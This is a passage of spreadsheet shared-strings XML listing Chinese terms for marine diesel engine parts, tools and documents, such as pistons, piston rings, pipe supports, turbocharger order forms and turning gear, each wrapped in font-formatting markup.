        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机操纵盒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机开关箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器故障时运行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器故障时的操作</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">VIT </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵工作原理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订货和检验规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器订货清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器订货单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订货规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油节流孔</t>
    </r>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
    </r>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈材料规范</t>
    </r>
  </si>
  <si>
    <r>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环规范</t>
    </r>
  </si>
  <si>
    <r>
      <t>0-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形套管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>溢流管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检修装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二冲程发动机的检修</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞套筒和上盖总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封剂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬条</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆橡胶垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形橡胶垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油漆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机油漆</t>
    </r>
  </si>
  <si>
    <r>
      <t>PAL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平头螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>穿壁接头</t>
    </r>
  </si>
  <si>
    <r>
      <t>901</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具盘</t>
    </r>
  </si>
  <si>
    <r>
      <t>902</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组工具盘</t>
    </r>
  </si>
  <si>
    <r>
      <t>904</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组工具盘</t>
    </r>
  </si>
  <si>
    <r>
      <t>906</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平键</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动配合平键</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件检验表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线箱部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>受控部件规程</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油枪通路</t>
    </r>
  </si>
  <si>
    <r>
      <t>ECR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电脑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞下部平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多孔气缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机转速传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴销规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴销规</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀销扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯管</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">90 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度弯管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管端（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SRG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支架</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式管夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管架安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支架下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支架上部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支管（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SRG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管卡</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管道连接件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路接口图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却芯管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>人孔管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管夹</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短管</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>段式管支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀接管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系部套概览</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路压力控制阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管道支撑位置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞组件工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞裙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞承板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞对中</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞对中指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却油监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却流量监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却油温度监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头滑油</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制手柄柱塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式活塞支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞密封圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞调整装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环安装钳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁活塞环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环张力调整装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆卸填料函</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器活塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶尖</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">D1A </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁螺塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>行星式盘车机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塑料薄片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路支架板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板材下料清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动元件板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
